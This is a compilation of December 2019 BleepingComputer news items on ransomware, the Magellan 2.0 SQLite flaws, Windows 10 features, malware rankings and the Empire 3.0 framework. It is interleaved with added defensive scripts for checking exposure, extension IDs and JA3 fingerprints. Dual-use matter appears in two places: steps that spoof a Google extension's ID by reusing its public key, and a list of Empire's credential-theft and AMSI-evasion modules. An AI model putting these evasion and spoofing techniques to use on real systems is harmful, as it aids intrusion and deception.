"They definitely have cases affecting WSL environments, which likely led them to blacklist NIX folders as they similarly do with the Windows ones. It is new to me and might explain why Ryuk and how Ryuk affects NIX machines via WSL," Kremez told BleepingComputer.

As the goal of most successful ransomware is to encrypt a victim's data without affecting the functionality of the operating system, this change makes sense.

With these folders being blacklisted, Ryuk eliminates an additional headache that they would need to deal with for a paying customer whose WSL installations are ruined.


New Magellan 2.0 SQLite Vulnerabilities Affect Many Programs
28.12.2019 
Bleepingcomputer  Vulnerebility

New vulnerabilities in the SQLite database engine affect a wide range of applications that utilize it as a component within their software packages.

SQLite is a relational database management system that is used by a wide variety of programs including Google Chrome, Mozilla Firefox, Windows 10, and many other well-known programs.

Almost one year after disclosing the original Magellan 1.0 SQLite vulnerabilities, Tencent Blade Team has disclosed another batch of SQLite vulnerabilities called Magellan 2.0.

Like its predecessor, this vulnerability affects all programs that utilize SQLite as a component in their software and that allows external SQL queries.

"These vulnerabilities were found by Tencent Blade Team and verified to be able to exploit remote code execution in Chromium render process," Tencent disclosed in an advisory. " As a well-known database, SQLite is widely used in all modern mainstream operating systems and softwares, so this vulnerability has a wide range of influence. SQLite and Google had confirmed and fixed these vulnerabilities. We will not disclose any details of the vulnerability at this time, and we are pushing other vendors to fix this vulnerability as soon as possible."

Using these vulnerabilities, Tencent was able to remotely execute commands in Google Chrome as long as WebSQL was enabled in the browser. This is a critical vulnerability as it means remote attackers could potentially use this vulnerability to fully compromise a computer.

"If you are using a software that is using SQLite as component (without the latest patch, which is 13 Dec 2019), and it supports external SQL queries. Or, you are using Chrome that is prior to 79.0.3945.79 with WebSQL enabled, you may be affected. Other devices such as PC/Mobile devices/IoT devices may also be affected, depends on if there's a proper attack surface."

Tencent has not seen any indication that these vulnerabilities have been utilized in the wild and reported them to Google and SQLite on November 16th, 2019.

After reporting the vulnerabilities, they were assigned CVE IDs CVE-2019-13734, CVE-2019-13750, CVE-2019-13751, CVE-2019-13752, CVE-2019-13753 and were fixed in Google Chrome 79.0.3945.79 and in patches applied to SQLite on December 13th, 2019.

All software that utilizes SQLite as an integrated component should install the latest version of the software to remain protected.
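The advisory's criteria (an unpatched SQLite build that accepts external SQL, or Chrome before 79.0.3945.79 with WebSQL enabled) can be turned into an inventory check. The following is an added example, not Tencent's, Google's or SQLite's code. The Chrome fixed version comes from the advisory text above; the SQLite threshold is an assumption, since the advisory gives only the patch date (13 December 2019): 3.31.0 is taken as the first SQLite release after that date, so earlier versions are treated as unpatched unless the vendor backported the fix. The inventory entries are constructed samples, not real hosts.

```python
"""Magellan 2.0 exposure check over a software inventory (added example)."""
from __future__ import annotations

import sqlite3
from dataclasses import dataclass

CHROME_FIXED = (79, 0, 3945, 79)   # from the advisory
SQLITE_FIXED = (3, 31, 0)          # assumption: first SQLite release after 13 Dec 2019


def parse_version(text: str) -> tuple[int, ...]:
    """'79.0.3945.79' -> (79, 0, 3945, 79); tolerates suffixes such as '3.30.1-r1'."""
    parts = []
    for piece in text.strip().split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            raise ValueError(f"unparseable version: {text!r}")
        parts.append(int(digits))
    return tuple(parts)


def version_lt(a: tuple[int, ...], b: tuple[int, ...]) -> bool:
    """Component-wise comparison, zero-padding the shorter tuple so 3.31 == 3.31.0."""
    n = max(len(a), len(b))
    return tuple(a) + (0,) * (n - len(a)) < tuple(b) + (0,) * (n - len(b))


@dataclass
class Component:
    name: str
    sqlite_version: str | None = None   # version of the embedded SQLite, if known
    chrome_version: str | None = None   # for Chromium-based software
    accepts_external_sql: bool = False  # can untrusted input reach the SQL engine?
    websql_enabled: bool = False        # the Chrome attack surface named in the advisory


def assess(c: Component) -> tuple[str, str]:
    """Return (verdict, reason) following the advisory's own criteria."""
    if c.chrome_version is not None:
        if version_lt(parse_version(c.chrome_version), CHROME_FIXED):
            if c.websql_enabled:
                return "affected", f"Chrome {c.chrome_version} < 79.0.3945.79 with WebSQL enabled"
            return "update", f"Chrome {c.chrome_version} is unpatched; WebSQL disabled limits exposure"
        return "patched", f"Chrome {c.chrome_version} includes the fix"
    if c.sqlite_version is None:
        return "unknown", "embedded SQLite version not recorded; inventory it"
    if version_lt(parse_version(c.sqlite_version), SQLITE_FIXED):
        if c.accepts_external_sql:
            return "affected", f"SQLite {c.sqlite_version} is unpatched and accepts external SQL"
        return "update", f"SQLite {c.sqlite_version} is unpatched; no external SQL path known"
    return "patched", f"SQLite {c.sqlite_version} >= {'.'.join(map(str, SQLITE_FIXED))}"


def local_python_sqlite() -> Component:
    """The SQLite library linked into this interpreter: a quick self-check for the host."""
    return Component("python:sqlite3", sqlite_version=sqlite3.sqlite_version)


# Constructed sample inventory (hypothetical hosts and version strings)
SAMPLE_INVENTORY = [
    Component("chrome-on-workstation-01", chrome_version="78.0.3904.108", websql_enabled=True),
    Component("chrome-on-workstation-02", chrome_version="79.0.3945.79", websql_enabled=True),
    Component("reporting-service", sqlite_version="3.30.1", accepts_external_sql=True),
    Component("config-store", sqlite_version="3.31.1"),
    Component("legacy-appliance"),
]

if __name__ == "__main__":
    for comp in SAMPLE_INVENTORY + [local_python_sqlite()]:
        verdict, reason = assess(comp)
        print(f"{comp.name:28} {verdict:9} {reason}")
```

The "unknown" verdict matters as much as "affected": software that statically links SQLite rarely advertises which version it carries, and the advisory's scope is exactly that set of embedded copies, so an inventory that cannot name the version should be treated as work still to do rather than as clean.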


Windows 10 2004 Under Development, Here Are the New Features
28.12.2019 
Bleepingcomputer  OS

The Windows 10 version 2004 Feature Update is expected to be released in the Spring of 2020 and it comes with a long list of improvements and new features.

Unlike the November 2019 Update, which was more like a service pack, Windows 10 2004 aims to bring new features and enhancements not seen in previous versions of Windows.

For those who wish to test Windows 10 2004, otherwise known as 20H1, and the various new features, you can join the Windows Insider program and install it now.

Changes in Windows 10 2004
Optional update experience
Starting with Windows 10 20H1, you no longer need to access the Device Manager to manage your drivers, and new device drivers will not be installed automatically.

Instead, new drivers will be detected as 'Optional updates' and will be listed under the 'View optional updates' screen where they can be installed.

This new page can be found under Settings > Update & Security > Windows Update > View optional updates.

Optional Updates screen
Task Manager gets an upgrade!
Windows 10's Task Manager is getting two new features - the first one allows you to see the disk type and the second one lets you monitor the temperature of the graphics card.

GPU temperatures in Task Manager
Reduced disk and processor utilization by Windows Search
In the past, many users would disable the Windows Indexer feature used by Windows Search because it used up too much CPU or caused high disk usage.

To prevent this from occurring, Windows 10 will use a new algorithm that detects high disk usage and activity, and if detected, will slow down the Windows Indexer.

"Based on this, we’re introducing an algorithm that detects high disk usage and activity, so it can better identify peak usage times and manage the indexer accordingly. We’re also making changes for developers to prevent searches of certain repositories and project folders to improve disk usage."

Download throttling options for Windows Update
Windows Update allows users to throttle bandwidth usage of Windows Update, but setting download throttling as a percent of available bandwidth isn't enough and some users are unable to reduce the impact on their internet connection.

Windows 10 20H1 introduces a new option that lets you set a specific speed that will be used to throttle Windows Update. You can set this for both foreground and background downloads. This option also controls the bandwidth used by the Windows 10 app store.

Users can access this option via Settings > Update & Security > Delivery Optimization > Advanced Options.

Passwordless experience
Microsoft is introducing passwordless sign-in for Microsoft accounts to strengthen your device sign-in. This allows Microsoft accounts to use 'modern multifactor authentication' such as Windows Hello, Fingerprint, and a PIN instead of passwords.

New Cortana experience
Windows 10 comes with a new Cortana experience that features a brand-new chat-based UI and it gives you the ability to type to interact with the digital assistant.

New Cortana experience
The updated Cortana supports both dark and light themes, Bing answers, Assistant conversations, allows you to open apps, set reminders, alarms, and timers as well. The firm has dropped jokes and other consumer-focused features.

Microsoft has created a less intrusive screen for “Hey Cortana” queries.
New speech and language models introduced.
Significantly improved performance.
Redesigned Network Status page
Microsoft has revamped the Network & Internet landing page in Settings. It offers more information about the network, so you can easily understand the connectivity of your device.

Redesigned network status page
The new Network page displays all available connection interfaces on the Status page and you can now see the data usage on this page as well.

Windows Search improvements
Windows 10 2004 brings improvements to Windows Search that include:

Improved spelling correction for Apps & Settings searches. Microsoft is making significant changes to how Windows Search's built-in spell checker works, so you can find the exact file you're looking for.
Windows search will intelligently understand and correct small typos like “powerpiont” and “exce”.
Windows Search now displays hints to improve Best match results under a 'Related:' line.
Account picture in Windows
You can now update the picture of your account that you use to sign in to Windows 10 quickly and the changes reflect across Windows, apps, and Microsoft sites that you use every day.

This can be done from Windows 10's Your info page with the ‘Create your picture’ option.

Optional Features
Windows 10's Settings > Apps & Features > Optional Features is getting the following new features:

Multi-select: The page finally allows you to select and install multiple optional features at the same time.
More useful information: It displays the installation date of each optional feature.
You can also view the status of your latest installs/uninstalls/cancels right on the main page.
Virtual desktops
You can now rename your Virtual desktops to quickly organize your office and personal work or multiple projects.

Rename Virtual Desktops
New Reset this PC from cloud feature
Windows 10's Reset this PC from Cloud is a new cloud recovery feature that allows users to reset their PC using Windows files downloaded from Microsoft’s servers.

Reset this PC from the cloud
New tablet experience for 2-in-1 convertibles
Windows 10 version 2004 offers a better tablet experience with increased spacing between Taskbar icons, the search box on taskbar collapsed into an icon and File Explorer with a touch-optimized layout.

Windows Sandbox
Windows Sandbox, which was introduced with the May 2019 Update, is getting accessibility improvements in this release. With Windows 10 20H1 Update, Windows Sandbox is getting support for Microphone, audio input devices, and the following two keyboard shortcuts:

Shift + Alt + PrintScreen activates the ease of access dialog for enabling high contrast mode.
Ctrl + Alt + Break allows entering/exiting fullscreen mode.
SwiftKey’s Typing Intelligence
Microsoft recently introduced SwiftKey’s typing intelligence for Windows and Spring 2020 Update adds support for more languages:

Afrikaans (South Africa), Albanian (Albania), Arabic (Saudi Arabia), Armenian (Armenia), Azerbaijani (Azerbaijan), Basque (Spain), Bulgarian (Bulgaria), Catalan (Spain), Croatian (Croatia), Czech (Czech Republic), Danish (Denmark), Dutch (Netherlands), Estonian (Estonia), Finnish (Finland), Galician (Spain), Georgian (Georgia), Greek (Greece), Hausa (Nigeria), Hebrew (Israel), Hindi (India), Hungarian (Hungary), Indonesian (Indonesia), Kazakh (Kazakhstan), Latvian (Latvia), Lithuanian (Lithuania), Macedonian (Macedonia), Malay (Malaysia), Norwegian (Bokmal, Norway), Persian (Iran), Polish (Poland), Romanian (Romania), Serbian (Serbia), Serbian (Serbia), Slovak (Slovakia), Slovenian (Slovenia), Swedish (Sweden), Turkish (Turkey), Ukrainian (Ukraine), Uzbek (Uzbek)
Dictation support
Microsoft is expanding Windows 10's Dictation support to devices using English (Canada), English (UK), English (Australia), English (India), French (France), French (Canada), German (Germany), Italian (Italy), Spanish (Spain), Spanish (Mexico), Portuguese (Brazil), and Chinese (Simplified, China) language.

Dictation

Users can access Windows 10's new and improved Dictation feature with the Win + H keyboard shortcut when the focus is set to a text field.

Language Settings
Microsoft is updating the Language Settings to make it easier for you to understand the language pack you've enabled for your Windows 10 installation.

This allows you to quickly find out which languages are selected as default for Windows apps, display, and websites, as well as for the Regional format and Windows Search.


Windows 10 File Explorer Bugs to be Fixed After Holidays
28.12.2019 
Bleepingcomputer  OS

Microsoft is working on fixes for various search-related bugs in File Explorer that were introduced when Windows 10 1909 was released.

With the release of Windows 10 version 1909, Microsoft integrated Windows Search directly into the File Explorer so that results are automatically shown as you perform a search.

File Explorer Search
With this new feature, new bugs were also introduced that cause File Explorer to hang, the search box to become blurry, the search field to become unresponsive, and that take away the ability to right-click in the search field.

When users have expressed concern about how long it is taking to resolve these issues, Microsoft's Brandon LeBlanc stated that they will look into the issue. As it is the holidays and this is not a critical issue, it will most likely not be addressed until after the holidays.


While this bug does not appear to be a huge priority for Microsoft, developers have been working on a fix.

In the release notes for the Windows 10 Insider build 19013 released in November, Microsoft states that they have fixed the bug making the File Explorer's search box unclickable.

"We fixed an issue where you could get into a state where it wasn’t possible to set focus to File Explorer’s search box in order to type your query."

In the release notes for Windows 10 Insider build 19536 released in December, Microsoft also states that they are making it possible to right-click in the search field to remove entries.

"We’ve updated the new File Explorer search experience to enable you to remove previous searches via an option if you right click the entry in the dropdown."

It is not known when Microsoft will push the fixes out to Windows 10 1909, but hopefully, they will be properly tested in the Insider builds before being pushed out to release versions.


Microsoft Edge Starts Testing a Taskbar Pinning Wizard
28.12.2019 
Bleepingcomputer  IT

Microsoft Edge has started testing a taskbar pinning wizard that helps you pin recommended sites and Microsoft apps to the Windows 10 taskbar.

When browsing a web site, both the classic Microsoft Edge and the new Chromium-based Edge browsers let you pin the site you are visiting on the Windows taskbar.

Microsoft is now testing a new 'Taskbar pinning wizard' in the Microsoft Edge Dev and Canary versions that will open a wizard that walks you through pinning various recommended sites to your taskbar.

To access this wizard, click on the Edge menu, select More Tools, and then click the Launch taskbar pinning wizard option as shown below.

Launch the Taskbar Pinning Wizard
Edge will now open a dialog box where you can select the sites you wish to pin to the taskbar. These sites are currently Facebook, YouTube, Wikipedia, Reddit, and Microsoft News.

Choose sites to pin
When you select a site, Edge will automatically pin it to the taskbar. To unpin a site, you can right-click on the taskbar icon and select Unpin or unselect it in the wizard.

If you click Continue, you will be brought to another page where the wizard recommends various Microsoft web apps that you can pin to the taskbar as well. The current choices are Microsoft Office, Microsoft News, and Bing.

Choose Microsoft apps to pin
If you click Continue again, you will be brought to the end of the wizard where you can close it.

For most people, this feature will be fairly useless and users are better off just pinning the sites they use and skipping this wizard altogether.

To me, this wizard appears to be nothing more than a tool to promote Microsoft's sites and other well-known sites that do not need much promotion, to begin with.


Maze Ransomware Releases Files Stolen from City of Pensacola
28.12.2019 
Bleepingcomputer  Ransomware

The actors behind the Maze Ransomware have released 2GB of files that were allegedly stolen from the City of Pensacola during their ransomware attack.

Earlier this month, the City of Pensacola was hit with a ransomware attack that impacted the city's email service, some phone service, and caused them to shut down their computer systems.

It was later confirmed by BleepingComputer that they were attacked by the Maze Ransomware who stated they stole data from the city before encrypting the network. They then demanded a $1 million ransom to decrypt their files.

Yesterday, the Maze actors released 2GB of the 32GB of files that they state they stole from the city before encrypting the network.

Alleged Proofs of Stolen Data
In a discussion with BleepingComputer, the Maze actors stated that they released the stolen data to prove to the media that they steal more than just a few files during a ransomware attack.

"This the fault of mass media who writes that we don't exfiltrate data more than a few files. We did not want to make a pressure on city, we still dont make it right now. We've shown that our intentions are real."

When BleepingComputer asked if they intended to release the rest of the data, they responded with "It depends".

BleepingComputer has also contacted the City of Pensacola, but have not heard back as of yet.


Entercom Radio Network Hit By Second Cyber Attack This Year
28.12.2019 
Bleepingcomputer  Attack

Giant radio network Entercom has been targeted in a new cyberattack that may have impacted the back-office functions. Some stations were apparently forced to run recorded programs.

This is the second time the network has to recover from a cyber event, the first one hitting in September being a ransomware attack that caused significant financial losses.

Entercom's network has more than 235 radio stations that broadcast news, sports, and music, and it has an audience of over 170 million people every month.

Systems went down, then back up
Details about the latest incident remain private at the moment but the company confirmed the attack and that it caused an outage.

The breach occurred on Sunday and it was not as troublesome as the ransomware attack as the network says that the issues were mostly fixed by Monday morning.

On-air machines remained largely unaffected but some markets could not import music logs and other types of content. The company experienced connectivity problems that disabled email communication, access to files, and content for the digital platforms.

According to journalist Jerry Del Colliano (paywalled), who called this recent attack "more sophisticated," the KYW 1060 station in Philadelphia had to air program segments recorded during the overnight hours.

Considering the short time required to resume activity to a relatively normal level, it may be that the security measures installed after the attack in September paid off.

According to InsideRadio, the company lost millions of U.S. dollars to that ransomware attack, which impacted revenues and triggered investing in new security systems.

It is alleged that the attackers demanded a ransom of $500,000 to decrypt Entercom's files during the incident in September. It is unclear if the company paid or not to have their data restored.


Emotet Reigns in Sandbox's Top Malware Threats of 2019
28.12.2019 
Bleepingcomputer  Virus

Any.Run, a public service that allows interaction with malware running in a sandbox for analysis purposes, compiled a list with the top 10 most prevalent threats uploaded to the platform. At the head of the list is Emotet.

The top includes malware designed to steal all sorts of sensitive information, banking details included, and remote access tools (RAT) that allow control over a compromised host.

Annual TOP10 threats by uploads to ANYRUN!

1 #Emotet 36026
2 #AgentTesla 10324
3 #NanoCore 6527
4 #LokiBot 5693
5 #Ursnif 4185
6 #FormBook 3548
7 #HawkEye 3388
8 #AZORult 2898
9 #TrickBot 2510
10 #njRAT 2355
https://t.co/Kx0pJYckBW

— ANY.RUN (@anyrun_app) December 23, 2019

#1 Emotet - 36,026 samples
Back in 2014 when it was first identified, Emotet was a promising banking trojan but its operators chose a different path to stay relevant in the cybercrime business.

Delivering other malware through carefully crafted malicious emails is the primary function of this threat these days. A common malware spread this way is TrickBot, a banking trojan with a shifted focus.

#2 Agent Tesla - 10,324 samples
An info-stealing program available commercially, Agent Tesla became popular among business email compromise (BEC) scammers, who use it to record keystrokes and take screenshots on the infected host.

The malware can also collect information about the system, steal data from the clipboard, and includes routines for killing running analysis processes and antivirus solutions.

#3 NanoCore - 6,527 samples
This is another tool favored by BEC scammers. NanoCore is a RAT that threat actors have used since 2013. Apart from providing remote access to a victim host, its capabilities also include keylogging, spying, file execution, capturing video and audio, editing the registry, and controlling the mouse.

NanoCore was the RAT of choice for SilverTerrier, a collective name for multiple groups engaged in BEC fraud, who created an average of 125 unique samples per month in 2018.

The developer of NanoCore was arrested in 2017 but its legacy continued through cracked versions that are still in use.

#4 LokiBot - 5,693 samples
LokiBot emerged on underground forums as an information stealer and keylogger but further development added various capabilities that allow it to evade detection and collect sensitive information.

Looking at a LokiBot sample this year, researchers noticed the following capabilities: anti-analysis, stealing data from at least 25 web browsers, checking for email and web servers running on the machine, looking for credentials in email and file transfer clients.

#5 Ursnif - 4,185 samples
This banking trojan has been around for some time and has been enriched with new features that kept it in the game.

Ursnif is typically associated with data theft, but some variants come with components like backdoors, spyware, or file injection. Deploying other malware, such as GandCrab ransomware, is another behavior researchers observed with this threat.

#6 FormBook - 3,548 samples
Another info-stealer, FormBook also runs routines to evade antivirus detection. It's been sold on public hacking forums since at least February 2016.

This malware was designed to grab data typed in web forms regardless of how it is entered, even when a virtual keyboard or the autofill function of a password manager is used.

Its functions include collecting credentials from web browsers (cookies, passwords), taking screenshots, as well as stealing clipboard content, keylogging, downloading and running executables from the command and control server, and stealing passwords from email clients.

#7 HawkEye - 3,388 samples
Another keylogger, HawkEye has been in the game since at least 2013, sold by the developer on hacking forums and dark web markets.

It maintains its keystroke interception capability but also provides new functions that allow stealing credentials from various applications and from the clipboard.

Updates for HawkEye are released regularly and advertised as an advanced monitoring solution for systems it runs on, providing data exfiltration functions.

#8 AZORult - 2,898 samples
Samples of this info-stealer have been observed in the wild since 2016, and it has been available on underground forums for as much as $100. The original version is Delphi-based, but a newer release written in C++ emerged this year.

Harvesting and exfiltrating data from a compromised system is its main purpose, and the list of targets is wide: passwords saved in web browsers, email and FTP clients, cookies, web forms, cryptocurrency wallets, chat history in messaging apps, and files.

#9 TrickBot - 2,510 samples
Labeled a banking trojan for its original functionality, the TrickBot of today combines many more features than this.

It can enumerate the users on the system, get passwords in web browsers, email and FTP clients, and collect local files from the victim machine.

It is typically delivered through Emotet and can itself deliver other malware to the system, Ryuk ransomware being one of the notable ones, most likely deployed after all useful information has been pilfered.

#10 njRAT - 2,355 samples
This is another RAT used by the SilverTerrier threat actor. Its history goes back to 2012, and its use is concentrated in the Middle East region.

Capabilities include logging keystrokes, turning on the microphone and web camera on the compromised system. Some samples also have the ability to exfiltrate the title of the current window used by the user.

Most of the malware in Any.Run's top 10 are not new on the scene. On the contrary, some of the samples are almost a decade old, yet they continue to be among the top choices for cybercriminals, proving that old dogs can still learn new tricks and companies should continue defending against known threats.


Make Your Own Google Chrome Extension to Show WWW Again
28.12.2019 
Bleepingcomputer  IT

If you are frustrated that Google Chrome no longer shows the WWW subdomain or http and https in the address bar, you can easily create your own Chrome extension that enables them again.

When Google released Chrome 76, they decided to hide the WWW "trivial subdomain" and the http and https indicators in the address bar.

WWW and https:// missing from address bar
When this happened, many users were upset about the change: they felt it was a security concern, that it is not technically accurate (www.example.com is not always the same host as example.com), and that it is confusing for users.

Users, though, were able to enable various flags in Chrome that reverted these changes. With Chrome 79, Google removed the flags and made it so that the only way to enable them again is to install their Suspicious Site Reporter extension.

As you can imagine, users were not happy with this situation and did not want to install a Google extension just to get back information that they felt should be shown already.

One of these frustrated users figured out how to show WWW, http, and https again by creating a custom extension that uses the same ID as the Suspicious Site Reporter extension from Google. This tricks Google Chrome into thinking their extension is installed and causes the www, http, and https to be displayed again.

Creating a custom Chrome extension to show WWW again
The good news is that it's very simple to create your own extension that shows www, http, and https again in the address bar.

To create the custom Chrome extension, please follow these steps:

1. Create a new folder on your computer named chrome-www.
2. Open Notepad and copy the following text into it:
{
"name": "Restore URL",
"version": "1.0",
"description": "Restores http and www in the omnibox",
"key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAowA8wOUQ8ShyITJ15B9rcJrnoolyo+OLj07g8QWBlEBikgszYwlbc88OIRL+dJOASok3yG6RQ60fvIjBrtNEk1yQZJfNwF/CN0jFrkE3HN3xVMoX0XIQPB93kDZARcfR5nwU3RUgwwWGTqt69KSSU8QzRRQJSEgM8GENa3OBhw1UBn/I/RbhaFcTykJSomo9j55goJwNzUhXTJk458DQ5diY+gWMadDXlDBa8cciCVlaGOjBV5ezmxnD6p1GXhrvyEKZP8IlreDJC2Nw9hxrT3GIo1FzbmeDPANKJ9pkY1H3LOVsGJDtytBpD/FRErlvfkJVqp3N5ifF2EQ8lOAHrQIDAQAB",
"manifest_version": 2
}
3. Save this Notepad file in the chrome-www folder as manifest.json.
Manifest.json file
4. Go to chrome://extensions/ and enable Developer Mode as shown below.
Enable developer mode in Chrome
5. This will enable the "Load Unpacked" button, which you should click. When prompted, select the chrome-www folder you created and press Select Folder.
Select Folder
6. After pressing "Select Folder" you will see an extension loaded in the browser called "Restore URL", which is the extension you just created.
Restore URL extension loaded
7. You can now close the extensions page and use your browser as normal.

Once the extension is loaded, you will find that Google Chrome once again shows www, http, and https in the address bar.

WWW showing again
The only side-effect to this extension is that Google Chrome will now display an alert prompting you to "Disable developer mode extensions". This is a harmless alert and is being shown because of how you installed the extension in developer mode.

Developer mode extensions alert
This alert will go away once you remove the custom extension or disable developer mode.
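Why a hand-written manifest can carry "the same ID" as Google's extension: Chrome derives an extension's ID from the public key in the manifest (SHA-256 of the DER-encoded key, first 32 hex digits, each mapped onto the letters a-p), and a public key is by definition not secret. The following added script, not part of the article, recomputes that ID from the manifest shown above so you can check what ID a sideloaded extension will claim before trusting it, and compare it with the Suspicious Site Reporter entry on chrome://extensions. The manifest text is copied verbatim from the steps; the DER prefix constant is the standard encoding of a 2048-bit RSA SubjectPublicKeyInfo. Note that matching the ID does not give the extension any of Google's signing rights: publishing or updating under that ID still needs the private key.

```python
import base64
import hashlib
import json

# The manifest from the steps above, copied verbatim. The "key" value is the
# public key that the article says belongs to Google's Suspicious Site Reporter.
MANIFEST_JSON = r'''{
"name": "Restore URL",
"version": "1.0",
"description": "Restores http and www in the omnibox",
"key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAowA8wOUQ8ShyITJ15B9rcJrnoolyo+OLj07g8QWBlEBikgszYwlbc88OIRL+dJOASok3yG6RQ60fvIjBrtNEk1yQZJfNwF/CN0jFrkE3HN3xVMoX0XIQPB93kDZARcfR5nwU3RUgwwWGTqt69KSSU8QzRRQJSEgM8GENa3OBhw1UBn/I/RbhaFcTykJSomo9j55goJwNzUhXTJk458DQ5diY+gWMadDXlDBa8cciCVlaGOjBV5ezmxnD6p1GXhrvyEKZP8IlreDJC2Nw9hxrT3GIo1FzbmeDPANKJ9pkY1H3LOVsGJDtytBpD/FRErlvfkJVqp3N5ifF2EQ8lOAHrQIDAQAB",
"manifest_version": 2
}'''

# DER prefix of a 2048-bit RSA SubjectPublicKeyInfo: SEQUENCE of length 0x122.
RSA2048_SPKI_PREFIX = b"\x30\x82\x01\x22"


def extension_id_from_key(key_b64: str) -> str:
    """Derive the Chrome extension ID from a manifest "key" value.

    Chrome hashes the DER public key with SHA-256, keeps the first 128 bits
    (32 hex digits) and maps each hex digit 0-9a-f onto the letters a-p.
    """
    der = base64.b64decode(key_b64)
    digest = hashlib.sha256(der).hexdigest()[:32]
    return "".join(chr(ord("a") + int(c, 16)) for c in digest)


def check_manifest(manifest_text: str) -> dict:
    """Parse a manifest and report what its "key" field implies for the ID."""
    manifest = json.loads(manifest_text)
    key_b64 = manifest.get("key", "")
    der = base64.b64decode(key_b64) if key_b64 else b""
    return {
        "name": manifest.get("name"),
        "key": key_b64,
        "der_length": len(der),
        "rsa_spki": der.startswith(RSA2048_SPKI_PREFIX),
        # Without a "key", Chrome derives the ID of an unpacked extension from
        # its folder path instead, so it would not collide with any store ID.
        "extension_id": extension_id_from_key(key_b64) if key_b64 else None,
    }


if __name__ == "__main__":
    report = check_manifest(MANIFEST_JSON)
    print(f'{report["name"]}: id={report["extension_id"]} '
          f'(DER {report["der_length"]} bytes, RSA SPKI={report["rsa_spki"]})')
```

The practical takeaway for anyone managing browsers: an extension ID identifies a key, not a code base. A check that only asks "is ID X installed?" cannot tell a Web Store copy from an unpacked folder that reuses the public key, so install source and signing still matter.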


Resurrected PowerShell Empire Framework Converted to Python 3
24.12.2019 
Bleepingcomputer  IT

Hackers of all sorts are getting an early Christmas present this year in the form of a resurrected PowerShell Empire post-exploitation framework all wrapped up in Python 3.

Released in 2015, the tool was officially discontinued by its original developers on July 31. Being open-source, the framework was forked more than 1,500 times and continued to be available for anyone who wanted to still try it out.

The decision was motivated by "the security optics and improvements that have been provided by Microsoft in the past few years."

BC Security, a consulting firm specialized in the assessment of wireless networks and threat emulation for enterprise networks, still believed that the project was an asset for offensive security and forked it.

Today, the security outfit published Empire 3.0 officially along with details about the changes introduced.

Under the new wrapping
The most notable modification is the conversion to Python 3, since support for version 2.7 ends on January 1, 2020. Apart from being essential to keeping the project alive, this also ensures that Empire remains relevant to the Kali Linux distribution for advanced penetration testing.

The incorporated modules also went through changes: some are new additions, and older ones received a refresh that pulled them out of the Dev branch of the original PowerShell Empire framework.

Mimikatz version 2.2.0 20191125
Get-Subnet_Ranges
Get-WinUpdates
Get-KerberosServiceTicket
Invoke-RID_Hijack
Invoke-internal_monologue
Get-LAPSPasswords
Invoke-SMBLogin
Sherlock
Outlook Sandbox Evasion for Windows Macro launcher
Invoke-CredentialPhisher
Invoke-Phant0m
Get-AppLockerConfig
HostRecon
One of the significant upgrades BC Security lists for the revamped Empire is improved evasion on Windows.

"This has been achieved by updating the base launchers to remove some of the distinctive signatures that existed."

Some bugs that stood in the way of reaching new evasion levels were fixed. One of them in particular made obfuscation more difficult and alerted Windows Defender.

The bypasses for the Antimalware Scan Interface (AMSI) have been updated so that they are smaller in size and have a different signature since security suites were already triggered by them.

Adding Mimikatz 2.2.0 to the framework makes it possible to run attacks against Windows 10 versions and dump hashes, passwords, and tickets stored in the memory of this operating system.

"Another new feature is the addition of Data Protection API (DPAPI) support for Powershell PSCredential and SecureString."

Another big improvement is the implementation of JA3/S signature randomization. JA3 is a method of fingerprinting TLS handshakes that is useful for identifying malicious encrypted traffic.

In the case of JA3, modifying the signature requires administrator-level permissions on the compromised computer. Randomization helps hide the Empire agent's communication with its command and control (C2) server. With JA3/S, admin privileges are not needed.
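To see why randomizing a handshake defeats JA3/JA3S-based detection, it helps to see how the fingerprint is built. The added example below, written for this article and not taken from Empire or the JA3 project, implements the published JA3 recipe: the decimal TLS version, cipher list, extension list, elliptic curve list and point format list, each joined with "-" and separated by ",", with GREASE values dropped, then MD5-hashed. The ClientHello field values are constructed for illustration. Reversing the extension order leaves the capabilities identical but yields a different hash, which is exactly the property a detection that keys on a single JA3 hash depends on.

```python
import hashlib


def is_grease(value: int) -> bool:
    """GREASE values (0x0a0a, 0x1a1a, ..., 0xfafa) are random filler inserted by
    browsers and are excluded from JA3 so a client's fingerprint stays stable."""
    return (value & 0x0F0F) == 0x0A0A and (value >> 8) == (value & 0xFF)


def _join(values) -> str:
    return "-".join(str(v) for v in values if not is_grease(v))


def ja3_string(version, ciphers, extensions, curves, point_formats) -> str:
    """ClientHello side: SSLVersion,Ciphers,Extensions,EllipticCurves,ECPointFormats."""
    return ",".join([str(version), _join(ciphers), _join(extensions),
                     _join(curves), _join(point_formats)])


def ja3s_string(version, cipher, extensions) -> str:
    """ServerHello side (JA3S): SSLVersion,Cipher,Extensions."""
    return ",".join([str(version), str(cipher), _join(extensions)])


def fingerprint(s: str) -> str:
    """Both JA3 and JA3S are the MD5 hex digest of their string."""
    return hashlib.md5(s.encode("ascii")).hexdigest()


# Constructed ClientHello fields (not captured from any real client or agent).
CLIENT_HELLO = {
    "version": 771,                                  # 0x0303, TLS 1.2
    "ciphers": [0x1A1A, 4865, 4866, 49195],          # first entry is GREASE
    "extensions": [0x0A0A, 0, 23, 65281, 10, 11],    # first entry is GREASE
    "curves": [0x2A2A, 29, 23, 24],                  # first entry is GREASE
    "point_formats": [0],
}


def baseline_fingerprint() -> str:
    return fingerprint(ja3_string(**CLIENT_HELLO))


def reversed_extensions_fingerprint() -> str:
    """Same extensions in the opposite order: the hash no longer matches."""
    params = dict(CLIENT_HELLO)
    params["extensions"] = list(reversed(CLIENT_HELLO["extensions"]))
    return fingerprint(ja3_string(**params))


if __name__ == "__main__":
    print(ja3_string(**CLIENT_HELLO))
    print("JA3 :", baseline_fingerprint())
    print("JA3 after reordering extensions:", reversed_extensions_fingerprint())
    # Constructed ServerHello: TLS 1.2, TLS_AES_128_GCM_SHA256, extensions 43 and 51
    print("JA3S:", fingerprint(ja3s_string(771, 4865, [43, 51])))
```

For detection engineering the lesson is to treat a JA3 hash as one weak signal: pair it with the JA3S of the server, the SNI and destination, the originating process and the traffic pattern, rather than allowlisting or blocklisting on the client hash alone.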

BC Security plans on continuing the development of the new PowerShell Empire post-exploitation framework and on expanding its feature set.

